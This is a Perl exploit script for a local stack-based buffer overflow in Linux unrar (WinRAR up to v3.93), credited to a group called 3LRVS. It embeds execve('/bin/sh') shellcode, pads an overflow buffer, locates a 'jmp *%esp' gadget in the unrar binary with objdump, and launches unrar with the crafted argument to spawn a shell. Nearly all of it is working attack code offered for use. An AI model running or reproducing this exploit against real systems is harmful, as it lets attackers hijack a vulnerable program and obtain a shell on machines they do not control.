#!/usr/bin/perl
=head1 TITLE
Winrar <= v3.93 Local Stack-based Overflow exploit
=head2 DESCRIPTION
This script triggers a buffer overflow attack against Unrar, the linux popular version of WinRar extractor.
It was not developped to bypass non-executing stack patches.
Have phun
=head2 AUTHORS
ZadYree ~~ 3LRVS Team - Low Level Languages Reversing Vxing Security
=head2 Tested ON
Linux Debian 6. May work on FreeBSD.
=head3 THANKS
kmkz
regol
hellpast
Hebiko
m_101
ZadYree
SNCF
The one who sent me that locked .rar
=cut
use 5.010;
# Shellcode: execve("/bin/sh") => http://www.shell-storm.org/shellcode/files/shellcode-752.php
use constant SHELLCODE => "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" .
"\x73\x68\x68\x2f\x62\x69\x6e\x89" .
"\xe3\xb0\x0b\xcd\x80";
use constant BUFF => ('-' . ('3lrvs' x 820));
##
$pname = "/usr/bin/unrar";
die "[-]File $pname does not exist!\012" unless (-e $pname);
say "[*]Looking for jmp *%esp gadget...";
for my $line(qx{objdump -D $pname | grep "ff e4"}) {
$esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
}
say '[+]Jump to $esp found! (0x', $esp, ")\012[+]Now exploiting...";
sleep(1);
my @payload = ($pname, (BUFF . pack("V", hex($esp)) . SHELLCODE . "\012"));
exec(@payload);
